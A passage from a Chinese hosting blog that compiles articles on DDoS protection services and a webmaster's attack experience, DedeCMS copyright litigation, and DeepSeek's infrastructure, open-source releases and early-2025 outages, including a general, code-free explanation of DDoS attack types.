劣势:考虑到成本,云高防商会对高防服务进行限制,比如限制DDOS峰值、限制带宽、限制某些功能等,需要结合自己的业务查看是否支持使用高防IP、高防CDN,如DDOS攻击过高,防御成本并不低。 适用对象:业务托管于云服务器商,因云服务商DDOS高防价格昂贵,不想在云服务商购买高防的用户,比如阿里云。 混合型DDoS防护: 在本地服务器部署WAF应用防火墙的同时再部署云防护,如高防IP、高防CDN等。 优势:结合了本地和云的优势,可以在本地处理日常流量和较小规模的攻击,而在遭遇大规模攻击时自动切换到云端进行清洗。这样既保持了控制力又能在需要时利用云的强大防护能力。 劣势:实现起来相对复杂,需要精心设计和配置。 三种方法混合型的DDOS防护价格最昂贵,而且维护相对麻烦,但效果是最好的。 主机帮这里推荐,如果不是很懂技术的,可以考虑用云防护模式,原因是简单,不需要什么技术门槛。 这里我们推荐使用百度云防护或者京东云星盾产品。 百度云防护:https://zhujib.com/shop/26864.html 京东云星盾:https://zhujib.com/shop/20576.html #### DDoS防御经验:阿里云服务器被DDoS攻击的经历 这篇文章来源于v2ex的一位站长的个人经历,主机吧觉得不错,就转载给大家参考下,当然其实购买的阿里云的高防IP主机吧认为有点浪费,阿里云高防IP又贵防御又小,不像主机吧提供的防御高价格便宜,哈哈!打个小广告。 1. 网站是放在阿里云 ECS 上的, DDoS 攻击后网站不能访问。从阿里云的后台看到流量在 15G 左右,网站服务器进入了阿里云的黑洞。 40 分钟后网站从黑洞里出来,瞬间又遭受攻击并打入黑洞。接下来的 3 个小时一直重复这个过程... 2. 因为已经严重影响业务了,所以购买了阿里云的高防 IP 。 DNS 解析到高防 IP 后,通知客服更换源 IP 。本以为高枕无忧,结果刚过了 10 分钟,网站又被打入黑洞。 攻击者应该是找到了新的源 IP ,直接攻击源服务器。因为高防 IP 到源 IP 走的是外网,所以源服务器进入黑洞后,高防 IP 无法连接源 IP ,导致网站又不能访问。 3. 发工单咨询了阿里云客服,答复是 使用负载均衡 ELB ,即 高防 IP->负载均衡->源 IP 。负载均衡作为桥梁,与高防 IP 走外网,与源 IP 走内网,这样即便源服务在黑洞中也可以访问了。 4. 对方发现 DDos 无效后,开始了 CC 攻击,网站又陷入了瘫痪中。检查以后发现 Mysql 连接数过多,而且连接状态绝大多数是 Sleep 。查看 php 的 slowlog ,找到了原因:源服务器某些页面需要对外请求微信服务器,因为不能访问外网, php 程序阻塞住了,对 Mysql 的连接不能释放。 5. 修改代码将微信和 QQ 相关的连接做了一个代理,对方是无法找到这个代理并打入黑洞的。 6. 攻击者开始变本加厉,最高时流量在 30G , QPS 有 2 万多,网站大量出现 502 错误,看来我蹩脚的 PHP 代码已经扛不住了。 nginx 日志显示其请求的网址比较固定,于是将这些页面做了静态化处理,并将非法的 POST 请求 ban 掉。哈哈!网站正常了。 有一些经验教训,供大家参考: 黑洞有一个触发值,默认是 5G ( 5GB 的阈值可以根据安全信用增加)。因为之前网站的安全信用很好,以经提高到 12G 了。黑洞的时间最短 40 分钟,最长 2 个半小时。整个攻防过程中,网站的信用评级直线下降,阈值降到 5G ,黑洞时间也延长到两个小时。 阿里云 ECS 是不能更换 IP 地址的,除非购买他们的高防 IP ,可以免费更换一次(后来发现实际可以更换多次)。 DDoS 在自己的服务器端是无法防御的,无论是设置安全组还是防火墙,只能去购买高防 IP 或者 CDN 。不过根据这两天的攻击来看,无论是阿里云高防还是 CDN ,在大流量的攻击下,源 IP 还是会暴露的。 DDoS 确定是竞争对手所为,但不想 DDoS 回去。不能助长这些黑产,也不能像别人一样 Low 。 #### DDOS防御需要用到哪些硬件设备 防御DDoS攻击的硬件防御方案主要包括: 防火墙:防火墙是一种硬件设备,可以监控网络流量并过滤恶意流量,从而保护服务器免受DDoS攻击。 负载均衡器:负载均衡器是一种硬件设备,可以将网络流量分散到多个服务器上,从而减轻单个服务器上的压力,提高网络可用性。 交换机:交换机是一种硬件设备,可以在网络中传输数据包,并根据设定的规则进行流量控制和过滤,从而提高网络安全性。 路由器:路由器是一种硬件设备,可以将数据包从一个网络转发到另一个网络,并根据设定的路由规则进行流量控制和过滤,从而保护网络免受DDoS攻击。 加速器:加速器是一种硬件设备,可以优化网络流量和应用程序性能,从而减轻服务器的负载,提高网络可用性。 这些硬件设备可以集成使用,以形成一种多层次的防御系统,从而提高网络的安全性和可用性,并保护网络免受DDoS攻击。 #### DDoS(分布式拒绝服务)攻击是无解的吗? DDoS(分布式拒绝服务)攻击并非无解,但确实是一个复杂且具有挑战性的网络安全问题。由于这类攻击通过大量合法请求或数据包淹没目标服务器或网络,导致其无法处理正常流量,因此防御需要综合多种策略和技术。 要减轻DDoS攻击的影响,您可以考虑采取以下措施: 使用防火墙和入侵检测系统来过滤恶意流量并进行报警。 与专业的DDoS防护服务提供商合作,将可疑流量重定向到清洗中心进行分析和过滤。 增加带宽容量以应对部分类型的DDoS攻击,但这并不能解决所有问题。 实施负载均衡,确保即使部分服务器受到攻击也能保持服务可用性。 配置访问控制列表(ACLs),限制特定IP地址或子网的访问。 设置速率限制和智能队列管理,降低攻击对网络资源的影响。 使用内容分发网络(CDN)分散流量并提供额外的安全层。 进行协议分析和过滤,识别并丢弃不符合正确协议格式的数据包。 持续监测网络流量并在发现异常时立即通知管理员。 制定应急响应计划,以便在遭受攻击时迅速启动缓解措施。 尽管这些方法可以帮助减轻许多DDoS攻击,但是没有一种单一的技术能够完全避免这种攻击。最有效的防御策略通常是结合多种方法,并随着攻击技术的发展不断更新防御手段。同时,保持良好的安全实践、及时更新软件补丁以及密切关注网络安全态势也是至关重要的。 #### DedeBIZ免费开源CMS系统 DedeBIZ系统基于PHP7版本开发,具有很强的可扩展性,并且采用GPLv2协议完全开放源代码。DedeBIZ支持采用现流行的Go语言设计开发,拥有简单易用、灵活扩展特性之外更安全、高效。模板设计制作简单,一直是系统一大特点,延续之前标签,同时采用响应式模板引擎Bootstrap作为系统模板渲染引擎,让搭建跨终端和移动端全媒体站点更简单。 DedeBIZ是前身dedecms,曾经是以dedecmsV6版本发布,不过后来可能因为版权争议,改成了DedeBIZ。 相比旧版的dedecms,DedeBIZ不仅商用免费,还重新设计了系统,更安全,同时还支持响应式模板引擎,旧的织梦CMS是PC跟移动是分开的,维护困难,还难用。 有需要的同学可以了解下:https://www.dedebiz.com/git #### DedeCMS开源库因知识产权存在争议被github封存项目 最近,织梦CMS版权纠纷在站长圈闹得沸沸扬扬,先是某医院胜诉侵权案,涉及开源协议问题胜诉,现在又来了新消息,由于DedeCMS且其知识产权存在争议,现已被github封存项目。 GitHub有一套版权政策,当收到侵权投诉时,它会采取行动,比如移除或封存涉嫌侵权的项目,直到问题得到解决。 如果一个项目被封存,项目维护者通常需要提供证据来证明他们有权使用相关的代码,或者修改代码以解决版权争议。一旦问题得到解决,项目就可以被解封。对于用户来说,这意味着在项目被解封之前,他们无法访问项目的源代码或贡献代码。 #### dedecms织梦版权侵权版权纠纷迎来新进展 持续近 3 年、涉及 300 万用户的织梦 CMS “系列” 版权纠纷案在近日迎来第一份抗辩成功判决。 2023 年 9 月 11 日,卓卓公司诉 **** 医院侵害计算机软件著作权纠纷案件立案。 2024 年 2 月 19 日,江苏省无锡市中级人民法院作出一审判决书,认可了 GPL 的 “传染性”,涉案软件(具体版本为 DedeCMSV5.7-sp1)整体按 GPL 对外许可,但要求使用者(被告)在网页底部添加原告网址链接,不得侵犯原告的署名权。 一审判决书在判决书送达之日起十五日,当事人没有提起上诉的,就会生效。据案件知情人士分析,卓卓公司肯定会上诉。 据判决书显示,卓卓公司提出,卓卓通过受让取得了 DedeCMS Biz V1.0 的软件著作权,又在 DedeCMS Biz V1.0 版本的基础上迭代出 DedeCMSV5.5、DedeCMSV5.6、DedeCMSV5.7 等版本。**** 医院名下网站相关网页相关源代码与卓卓公司享有著作权的涉案软件代码相同,证据包括授权协议中的卓卓公司名称、Powered By DedeCMS、织梦内容管理系统 DEDECMS 的 logo/mark 等等。但 **** 医院并未向卓卓公司购买正版涉案软件,也从未获得过卓卓公司商业使用授权许可。因此卓卓要求 **** 医院支付涉案软件 DedeCMS 软件的授权许可费 5800 元,以及卓卓公司为诉讼所指出的 8700 元费用,共计 14500 元。 而 **** 医院辩称:卓卓虽然通过受取得 DedeCMS Biz V1.0 的软件著作权,但没有证据能够证明卓卓公司是织梦内容管理系统 DedeCMS 软件的著作权人。此外,DedeCMS 是一款以 GPL 协议对外许可发布的开源软件,DedeCMS 后续版本包括涉案权利软件都是在 DedeCMSV3 版本基础上迭代升级的,因此受 GPL 约束。根据 GPL 协议禁止添加商业使用的限制条款,也不允许著作权人就软件本身收取授权许可费。 此外,围绕案件,卓卓公司和 **** 医院还列举了多项诉求与证据,详情可查看一审判决书(尚未生效)。 此份判决书由知情人提供并脱密:https://report.oschina.net/api/files/jhim80u9qm1ofsw/79ci47r1rrt9yqm/2023_02_482_cEvUNytTpS.pdf 法院总结此案件争议焦点有两个: 综合双方的诉辩主张,并经双方确认,本院对本案的争议焦点归纳为: 一、涉案权利软件的著作权人是否是卓卓公司; 二、**** 医院是否有权依据 GPL 协议免费使用涉案权利软件 针对第一点,法院认为: 涉案权利软件的著作权人是卓卓公司。 针对第二点,法院认为:  涉案软件 DedeCMSV5.7-sp1 是包含采用 GPLV2.0 及以后版本做为协议的 sphinxclient 的派生作品。…… 由此本案中卓卓公司将涉案软件进行发布代表卓卓公司已经接受 GPL 协议。 …… 涉案软件应当遵守 GPL 协议,卓卓公司在涉案软件的许可协议中的 “商业用途需获得授权” 的条款与 GPL 协议相抵触,卓卓公司有义务按照 GPL 协议将涉案软件整体授权给获得许可的人,**** 医院因 GPL 协议获得了对涉案软件使用的授权,并未侵犯卓卓公司的复制权,卓卓公司无权对此行为请求支付授权费用。  不过,法院认为 **** 医院需在网站注明来源是卓卓公司。  卓卓公司在许可协议中载明用户应在使用涉案软件建成网站的主页标注网站链接 www.dedecms.com,该条款并不构成对下游接收者对软件复制、分发、修改权利的限制,应当有效。 …… GPL 协议作为许可协议有双务性,被许可人在行使复制、发布修改开源软件的权利时,也需要按照协议要求承担相应义务,**** 医院使用涉案软件 DedeCMS 建成了网站,但未在主页标注卓卓公司创作印记或官网链接,违反了该附加条款,侵害了卓卓公司的署名权,损害了卓卓公司的身份权益。故卓卓公司请求 **** 医院赔偿损失并赔礼道歉,具有事实和法律依据,本院予以支持。  最终,法院判定由 **** 医院赔偿卓卓公司经济损失及合理维权开支共 800 元,并在判决生效之日起十日内在其公司网站主页发布为期三十日的赔礼道歉声明。在关于赔偿金额的表述中,法院的考量因素中还提到两点值得关注: 第三,卓卓公司主张 **** 医院在内的用户需遵守涉案软件的许可协议,但卓卓公司在使用他人代码时却未遵守他人软件的 GPL 许可协议,其行为本身有违诚信原则,具有不正当性。卓卓公司自身对涉案软件的著作权也存在管理不周的情况,软件源代码中记录的版权信息、署名都未直接指向卓卓公司,源代码中不同位置的许可协议条款存在不一致的情形。 第四,卓卓公司以涉案软件为权利基础,在全国法院提起大量侵害计算机软件著作权纠纷案件,并因此获得较大收益,该种维权模式既不利于有效打击侵权源头,又大量占用解决纠纷的公共资源,不宜提倡和鼓励。 GPL协议的定义和原理 定义 GPL协议(GNU General Public License),是由理查德·斯托曼(Richard Stallman)为GNU计划所撰写的一种自由软件许可协议。GPL协议的主要目的是确保软件的自由传播,允许用户使用、修改和再发布源代码,同时保护源代码的版权。 原理 GPL协议要求,如果一个软件使用了GPL协议下的代码,那么该软件也必须采用GPL协议,并开放其源代码。这种要求是通过所谓的“Copyleft”机制实现的,它是一种反向的版权声明,保证所有基于GPL协议发布的软件必须继续使用GPL协议。 GPL协议的内容具备合同特征,是一种民事法律行为。它规定了用户在获得和使用开源软件时必须遵守的条款,如必须保持软件的开放性、不得剥夺用户的自由等。 据企查查信息显示,上海卓卓发起了多起侵害计算机软件著作权纠纷诉讼,自 2 月 28 日 - 3 月 30 日将陆续有案件开庭。 #### DedeCMS织梦版权强制收费后 多位站长收到侵权告知涵 织梦(DedeCMS)是国内最早一家做开源CMS程序的了,由于功能强大,易用,深受广大站长喜爱,在站长火热的时代,国内CMS市场占有率一度达80%以上,当时比较出名的站长之家、A5都是使用织梦做的后台。主机吧刚开始做网站的时候也是用的织梦做的网站,入手非常简单,那时候只要有点网络基础的,看下官方教程 都很容易觉会,最让主机吧喜欢的是织梦可以生成全站纯静态页面,对于当时那个不发达的国内网络环境而言,可以大大节省服务器带宽,提高访问网站速度,而且也深受搜索引擎欢迎。 这样一个强大的CMS不知道什么时候开始已走向没落,曾好几年没有再更新过,不过从去年开始官方又开始更新了。 不过随之而来的是一篇公告 没错,织梦开始收费了,价格还不便宜,一个域名5800元。这下直接在站长圈炸开了锅,因为很多站长一直是拿织梦当免费使用的,很多个人站长、公司、建站公司都是用织梦做的后台,一下子收费,而且一个域名5800元,实在是难以接受。 其实,织梦老早就有商业授权机制,只是当时国内环境因素,很少人在意这个商业授权,官方也没有强制过站长购买授权,久而久之大家都默认织梦就是免费的。 当然目前站长的环境这么差,织梦这个时候出来收费确实有点不地道。主机吧查看了下,目前已经有多位站长收到了织梦的告知涵了。 很多站长表示自从织梦强制收费后,就把网站停了,有的站长直接更换系统。 而那些有钱的,不想折腾的则选择交钱。当然也有选择硬刚的,不理会,不交钱,收到法院传票就打官司。 就目前主机吧的了解来看,选择换系统的比较多,不过换系统并不是一件容易的事,很多系统并不如织梦好用,并不能做到完美切换系统。主机吧这边推荐大家用DedeCMSV6这个版本,这是一个由织梦原创始人“柏拉图”授权发行的版本,可以直接把原织梦系统升级过来,非常方便。 而且DedeCMSV6支持PHP7.X,可以说是紧跟时代主流。 虽然DedeCMSV6也有商业授权,不过主机吧看了下,社区版是支持个人和机构团体是支持商业使用的,前提是支必须保留版权信息,而商业版3800元。 有需要的站长可以了解一波,官方地址:https://www.dedebiz.com/ #### dedecms织梦程序侵权案官司案件来了! 去年开始,织梦所属公司就一直开始了维权之路,不少站长都有收到律师涵,不过很少见到有真的打官司,毕竟打官司太麻烦,也需要钱。不过今天主机吧发现织梦官网发了下篇关于胜诉的官司。 被告站长总共损失11800元,织梦获利5800元,其它的诉讼费用杂七杂八的。 被告的站长也挺惨的,很多年没有维护的网站,就挂了个单页,就被织梦逮到了。 有还在用织梦的站长,又离不开织梦系统的,去买个织梦授权吧,以免造成不必要的麻烦。 #### DedeCMS(织梦CMS)创始人林学先生(IT柏拉图)因病去世 今天dedebiz官方了一条令人惋惜的消息: 2022年12月3日下午DedeCMS创始人林学先生(IT柏拉图)因罹患癌症逝世。林学先生生于1979年10月10日,于2004年8月编写的DedeCMS至今仍有数十万企业、个人站长使用,在使用者中不免有一些互联网巨头,其中bilibili更是基于DedeCMS白手起家,而林学先生一直秉承着开源免费的理念,通过技术改变了中国,却从未因DedeCMS过上体面的生活。在此我们缅怀林学先生为中国开源作出的贡献,其遗志必将传承下去,为社会创造更多价值。 国内开源CMS鼻祖绝对是DedeCMS莫属,巅峰时期曾一度占据国内CMS市场达80%以上,那个时候国内大型资讯网站几乎都是用织梦做的后台,其中包括站长之家、A5站长等知名网站,主机吧用的第一个开源CMS就是织梦,织梦CMS的操作简单,很容易上手,可以实现很多非常棒的网页效果,主机吧还曾利用织梦CMS做网站实现日IP2万的巅峰。 后来不知道什么原因,织梦多年没有更新,而且漏洞一直没人修复,很多网站都放弃了。后来才得知,创始人柏拉图离开原织梦公司后,织梦CMS就没有再怎么更新了。 再后来,原织梦开发团队的人又创建了dedebiz,这是一个在dedecms基础上开发的程序,目前更新到V6.2.3版本。 不管怎么说,林学先生(IT柏拉图)对国内开源贡献真的大,没有他,当年几百万站长,很多都不会做网站,包括主机吧,真的令人惋惜。 #### DeepSeek 使用的是哪家的服务器 采用哪高防? 最近,国内火爆全球的AI工具DeepSeek 遭遇了大量网络攻击,其中除了我们熟知的分布式拒绝服务攻击(DDoS)外,还有暴力破解攻击、HTTP代理攻击、僵尸网络攻击等。 大家一定很好奇DeepSeek 是用什么来防御这些攻击的? 我们通过域名ping域名 我们可以看到 DeepSeek 的国内显示的IP来自华为云,而海外采用的是Cloudflare的节点来防御,Cloudflare是一家总部位于美国的网络安全防御公司,其在海外拥有海量的节点,而且为用户提供无限量的DDOS防御能力,是基本出海用户必备的高防CDN。 也就是说,实际 DeepSeek的服务器起码采用的是华为云的,国内防御也是用华为云的高防,海外采用的是Cloudflare防御。 而网上流传的360无偿为DeepSeek 提供防御,目前没有查到DeepSeek 有任何部署360相关特征,所以应该是没有使用360的。 我们通过测试发现DeepSeek 部署有应用防火墙的,只是不知道是用哪家的。 不过主机邦猜测应该也是用华为云的,因为基本可以肯定 DeepSeek 使用的是华为云的高防服务,而部署在云上的话,肯定是华为云高防IP跟华为云WEB应用防火墙WAF 一起结合才是最好的。 主机邦查询了下 DeepSeek应该是采用了华为云的DDoS 原生防护服务,最便宜的3个月114600元,无限防御,最高防御可达1T。 对于大公司来说,这个价格还是非常划算的,当然啦,像DeepSeek这种体量的,带宽应该不低,所以防御成本可能更高。 #### DeepSeek 增加服务器IP了 还是用华为云! 今天,主机邦发现 DeepSeek的服务器繁忙问题似乎有所缓解,使用过程中也没有出现服务器繁忙的情况了。DeepSeek难道热度减小了?还是没有攻击了?或者换服务商了?带着好奇,主机邦ping了下DeepSeek 的域名。 发现虽然 DeepSeek 虽然还是用华为云上海机房的云服务器,但是www子域名的IP已经变了,之前使用的是60.204.2.236这个IP。 而chat、api子域名则增加了一个60.204.2.145的IP 看样子DeepSeek 应该是服务器扩容了,增加了负载均衡,让应用更稳定了,只是好奇为什么不用CDN呢?难道是不适合使用CDN?还是CDN成本太高?毕竟字节跳动的豆包AI都使用了CDN。 #### DeepSeek 开源周第二弹:全球首个MoE专用通信库DeepEP正式发布 2024年2月25日 - 在AI基础设施领域掀起开源风暴的深度求索(DeepSeek),继首日发布引发行业震动后,今日正式推出其「开源周」第二项重磅成果——专为混合专家模型(MoE)打造的DeepEP通信库。该项目的GitHub仓库已同步开放(访问仓库),标志着大规模MoE模型训练进入全新阶段。 技术亮点解析 作为首个针对MoE/EP范式优化的开源通信解决方案,DeepEP带来六大突破性特性: 全场景通信优化 创新性实现节点内(NVLink)与跨节点(RDMA)双通道通信 预填充阶段采用高吞吐内核,训练效率提升40%+ 解码阶段启用低延迟内核,响应速度优化30% 前沿计算支持 行业首个完整支持FP8数据调度的通信库 动态精度适配模块,自动匹配不同计算需求 资源智能调度 基于Hook的通信-计算重叠技术,实现零SM资源占用 智能带宽分配系统,自动识别NVLink/RDMA最优路径 实战价值解读 该库特别适配DeepSeek-V3论文提出的组限制门控算法,通过三大技术创新解决行业痛点: 非对称带宽优化:针对MoE特有的数据转发模式,开发跨域传输专用内核 动态SM调控:根据任务类型自动调整流处理器占用比例 混合精度管道:构建从FP8到FP32的无缝精度转换通道 开发者适配指南 环境要求推荐配置GPU架构NVIDIA Hopper (H100等)Python版本≥3.8CUDA版本≥12.3PyTorch版本≥2.1网络环境NVLink节点内/RDMA跨节点 #### DeepSeek 开源第五弹:高性能文件系统3FS突破6.6 TiB/s吞吐,赋能AI数据洪流 2月28日,国内AI领域先锋DeepSeek在其“开源周”压轴日宣布,正式开源3FS(Fire-Flyer File System)高性能并行文件系统及配套数据处理框架Smallpond。这一组合剑指AI时代海量数据处理的效率瓶颈,凭借突破性的吞吐性能与去中心化架构设计,为深度学习训练、推理等场景提供了全新的基础设施支持。 3FS:重新定义分布式存储性能极限 作为专为现代SSD硬件与RDMA高速网络量身打造的文件系统,3FS通过创新的并行架构设计,彻底释放硬件潜能。其核心亮点在于: 集群吞吐登顶:在180节点规模的测试集群中,3FS实现了6.6 TiB/s的聚合读取吞吐,相当于每秒传输逾14部4K蓝光电影。 基准测试横扫:以25节点完成GraySort基准测试时,以3.66 TiB/分钟的成绩刷新效能标杆,展现极速排序与数据搬运能力。 单节点爆发力:单个客户端节点的KVCache查询峰值突破40 GiB/s,满足高并发实时需求。 架构革命:采用无中心节点的分布式设计,同时确保强一致性语义,兼顾性能与数据可靠性。 穿透AI工作流全场景,化解数据“卡脖子”难题 3FS并非实验室技术,而是直接服务于DeepSeek自身大模型训练体系(如V3/R1版本),覆盖AI数据生命周期的关键环节: 训练前:加速TB级数据预处理与分布式加载,缩短模型迭代周期。 训练中:实现分钟级千卡集群检查点保存/恢复,规避训练中断风险。 推理时:支撑毫秒级向量检索与KVCache查询,保障低延迟响应。 长期运维:提供PB级模型参数的高效版本管理,简化生产部署。 Smallpond:轻量级数据处理的“涡轮引擎” 同步开源的Smallpond框架,将3FS与DuckDB分析引擎深度融合,打造“即时可用”的数据处理方案: 零服务依赖:无需常驻后台进程,按需启动释放资源。 PB级扩展:依托3FS分布式存储,轻松应对超大规模数据集。 SQL友好:内置DuckDB支持标准查询语言,降低开发门槛。 开源生态双星闪耀3FS与Smallpond已全面开放源代码,开发者可通过以下链接深入探索: 3FS项目地址:https://github.com/deepseek-ai/3FS Smallpond框架地址:https://github.com/deepseek-ai/smallpond 此次开源标志着DeepSeek“开源周”计划的圆满收官,也预示着AI基础设施领域或将迎来新一轮性能革新。随着算力竞争进入白热化,突破存储瓶颈的3FS能否成为国产大模型训练的“隐形引擎”?业界正拭目以待。 #### DeepSeek-V3 模型更新,各项能力全面进阶 3 月 25 日消息,DeepSeek-V3 模型昨日进行了小版本更新,今晚官方发布了该更新的详情。 以下是全文内容如下: DeepSeek V3 模型已完成小版本升级,目前版本号 DeepSeek-V3-0324,用户登录官方网页、App、小程序进入对话界面后,关闭深度思考即可体验。API 接口和使用方式保持不变。如非复杂推理任务,建议使用新版本 V3 模型,即刻享受速度更加流畅、效果全面提升的对话体验。 模型能力提升一览 推理任务表现提高 新版 V3 模型借鉴 DeepSeek-R1 模型训练过程中所使用的强化学习技术,大幅提高了在推理类任务上的表现水平,在数学、代码类相关评测集上取得了超过 GPT-4.5 的得分成绩。 新版 V3 模型的百科知识(MMLU-Pro, GPQA)、数学(MATH-500, AIME 2024)和代码任务(LiveCodeBench)表现均有提升 前端开发能力增强 在 HTML 等代码前端任务上,新版 V3 模型生成的代码可用性更高,视觉效果也更加美观、富有设计感。 动图展示了一个由模型生成的演示多个小球在指定空间范围内运动的 p5.js 程序,包含若干可以调整重力、摩擦力等参数的滑动按钮,并以赛博朋克风格的 HTML 呈现 中文写作升级 在中文写作任务方面,新版 V3 模型基于 R1 的写作水平进行了进一步优化,同时特别提升了中长篇文本创作的内容质量。 中文搜索能力优化 新版 V3 模型可以在联网搜索场景下,对于报告生成类指令输出内容更为详实准确、排版更加清晰美观的结果。 此外,新版 V3 模型在工具调用、角色扮演、问答闲聊等方面也得到了一定幅度的能力提升。 模型开源 c-0324 与之前的 DeepSeek-V3 使用同样的 base 模型,仅改进了后训练方法。私有化部署时只需要更新 checkpoint 和 tokenizer_config.json(tool calls 相关变动)。模型参数约 660B,开源版本上下文长度为 128K(网页端、App 和 API 提供 64K 上下文)。V3-0324 模型权重下载请参考: Model Scope:  https://modelscope.cn/models/deepseek-ai/DeepSeek-V3-0324 Huggingface:  https://huggingface.co/deepseek-ai/DeepSeek-V3-0324 与 DeepSeek-R1 保持一致,此次我们的开源仓库(包括模型权重)统一采用 MIT License,并允许用户利用模型输出、通过模型蒸馏等方式训练其他模型。 另外,主机帮测了下, DeepSeek-V3最新数据已经更新到2024年7月。 #### deepseek:DDOS攻击的工作原理是什么? DDoS(分布式拒绝服务)攻击通过协调大量受控设备向目标发送海量请求,耗尽资源使其瘫痪。以下是其核心原理的分步解析: 1. 攻击基础架构:僵尸网络(Botnet) 感染设备:攻击者通过恶意软件感染全球范围内的计算机、IoT设备等,形成可远程控制的僵尸网络。 控制节点:通过命令与控制服务器(C&C)集中操控僵尸设备,统一发动攻击。 2. 攻击目标与资源耗尽 攻击核心是耗尽目标的三大资源: 带宽:用巨量数据堵塞网络通道。 计算资源:消耗CPU/内存处理恶意请求。 连接数:占满服务器最大并发连接。 3. 主要攻击类型及原理 (1)流量型攻击(Volumetric Attacks) 原理:发送海量数据包淹没目标带宽。 典型手段: UDP反射放大:伪造目标IP向开放服务(如DNS、NTP)发送小请求,触发大响应(放大效应),如DNS查询响应可放大50倍。 ICMP Flood:发送大量Ping请求耗尽资源。 (2)协议攻击(Protocol Attacks) 原理:利用协议漏洞耗尽服务器资源。 典型手段: SYN Flood:发送大量TCP SYN包但不完成三次握手,占满连接队列。 Ping of Death:发送畸形ICMP包导致系统崩溃。 (3)应用层攻击(Application Layer Attacks) 原理:模拟合法请求消耗应用处理能力。 典型手段: HTTP Flood:高频访问动态页面(如搜索),拖慢数据库响应。 Slowloris:保持大量慢速HTTP连接,占用并发上限。 4. 攻击执行流程 侦查阶段:识别目标弱点(如未防护的UDP服务)。 武器化:利用漏洞感染设备组建僵尸网络。 发动攻击:通过C&C下达指令,僵尸设备同步发动定向攻击。 持续打击:动态调整攻击模式,绕过基础防御措施。 5. 防御难点 溯源困难:攻击源分散且IP伪造,难以快速拦截。 规模压制:僵尸网络可达Tbps级流量(如Memcached反射攻击峰值1.7Tbps)。 区分合法流量:应用层攻击模拟正常用户行为,传统防火墙难以识别。 总结 DDoS攻击本质是资源不对称战争,通过分布式架构将攻击效果指数级放大。防御需结合流量清洗、行为分析、云分散(CDN)等综合策略,以对抗不同层次的攻击手法。 #### DeepSeek因被攻击多次宕机,引发网络安全关注 2025年1月26日和27日,国产大模型公司深度求索(DeepSeek)旗下的人工智能服务多次出现宕机现象。1月26日下午和晚间,DeepSeek曾两次出现短时闪崩现象。1月27日,DeepSeek服务状态页面显示其网页和API不可用,影响了API服务和网页对话服务。当晚21点33分,DeepSeek网页和API性能再次出现异常,这是继前两日多次宕机后,该公司在48小时内经历的第三次大规模服务中断。此次事件不仅引发用户对AI服务稳定性的质疑,更因DeepSeek新模型的全球爆火,间接导致美股科技股剧烈震荡。 根据DeepSeek官方状态页面显示,1月27日21点33分起,网页和API服务出现性能异常,用户无法登录及使用对话功能,直至当晚22点后部分功能才逐步恢复310。此前,该公司在26日和27日白天已发生四次宕机,包括API服务中断、网页无法访问等问题,单日最长修复时间超过两小时。 DeepSeek回应称,宕机主因是新模型发布后全球用户访问量激增,服务器承载压力远超预期。 2025 年 1 月 28 日,DeepSeek 发布公告称:近期线上服务受到大规模恶意攻击,注册可能繁忙,请稍等重试。已注册用户可以正常登录,感谢理解和支持。 1月20日推出的开源推理大模型DeepSeek-R1凭借“低成本、高性能”特性迅速走红,其训练成本仅557.6万美元,性能却对标OpenAI的o1模型,且每百万token查询成本仅为后者的1.8%。该模型发布后,DeepSeek应用迅速登顶中美区苹果应用商店免费榜,超越ChatGPT。 DeepSeek-R1的低成本优势引发资本市场对AI算力投资逻辑的反思。华尔街分析指出,若AI大模型可脱离高算力依赖,英伟达等芯片巨头的增长前景将受冲击。1月27日美股盘前,英伟达暴跌超17%,市值单日蒸发近5600亿美元;博通、台积电等芯片股跌幅均超10%,纳斯达克科技巨头市值合计缩水近万亿美元 DeepSeek的爆红背后,其技术团队成为焦点。公司核心开发者罗福莉因主导研发MoE大模型DeepSeek-V3被称为“95后AI天才少女”,其从阿里达摩院到幻方量化的职业路径,以及小米创始人雷军开出的千万元年薪邀约,折射出行业对顶尖人才的激烈争夺。 作为量化巨头幻方量化旗下企业,DeepSeek自2023年成立以来持续受资本关注。然而,频繁宕机暴露了初创公司在基础设施扩容、负载均衡等方面的短板。公司招聘信息显示,其正紧急扩编技术团队,核心系统研发工程师岗位月薪高达9万元,实习生日薪亦达500-1000元,显见应对压力的迫切需求。 此次事件引发业界对AI服务可靠性的深度讨论。专家指出,DeepSeek的技术突破虽降低了模型训练成本,但用户规模爆发式增长对服务稳定性提出更高要求。如何在创新与运维间取得平衡,将成为所有AI初创公司的共同挑战。正如游戏科学CEO冯骥所言:“DeepSeek的成就可能是国运级突破,但它的宕机同样提醒我们,技术革命需要扎实的基建支撑。” #### DeepSeek开源周第四日发布关键技术:优化并行策略助力大模型高效训练 2024年2月27日——国内人工智能领域领军企业DeepSeek持续推进其“开源周”计划,今日正式公开第四批核心技术成果,聚焦优化并行策略,发布三项关键项目:双向管道并行算法DualPipe、专家并行负载均衡器EPLB,以及V3/R1架构下的计算-通信重叠分析工具。此次开源旨在解决超大规模模型训练中的效率瓶颈,为开发者提供可落地的技术方案。 DualPipe:双向流水线并行算法突破效率极限 作为DeepSeek-V3技术报告中提出的创新成果,DualPipe专为千亿参数级模型的分布式训练设计,通过双向数据流管道实现正向与反向计算-通信阶段的完全重叠。与传统单向流水线相比,该算法在反向传播过程中同步执行前向计算,显著减少了流水线中的“气泡”(即空闲等待时间),从而提升硬件利用率。 据技术文档显示,DualPipe通过智能调度机制动态协调计算与通信任务,尤其适配V3/R1架构的超大规模集群。这一设计不仅降低了训练迭代耗时,还为万亿参数模型的扩展提供了技术基础。项目地址:https://github.com/deepseek-ai/DualPipe EPLB:动态负载均衡器破解MoE训练难题 在混合专家模型(MoE)训练中,专家任务分配不均常导致部分GPU过载(即“热点专家”问题),而其他GPU资源闲置。DeepSeek开源的**专家并行负载均衡器(EPLB)**通过两项核心策略解决这一挑战: 冗余专家复制:针对高负载专家,EPLB动态创建副本,并通过启发式算法将其分配到不同GPU,确保计算资源均衡利用。 分组路由优化:结合DeepSeek-V3论文中的分组受限路由策略,EPLB优先将同一专家组的副本部署在同一计算节点内,最大限度减少跨节点通信流量。 开发者可通过开源代码库(eplb.py)直接调用负载均衡算法,快速部署适配自身硬件的专家分配方案。需注意的是,专家负载预测方法(如历史数据移动平均法)需结合具体场景实现。项目地址:https://github.com/deepseek-ai/EPLB 计算-通信重叠分析:透明化训练优化过程 